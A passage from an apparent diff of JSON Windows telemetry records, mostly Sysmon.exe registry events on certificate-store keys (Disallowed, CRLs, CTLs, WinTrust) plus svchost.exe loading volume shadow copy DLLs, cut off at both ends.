"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "vssapi.dll", + "image_path": "C:\\Windows\\System32\\vssapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901990000, + 
"unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "vsstrace.dll", + "image_path": "C:\\Windows\\System32\\vsstrace.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570901990000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", 
+ "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570902930000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 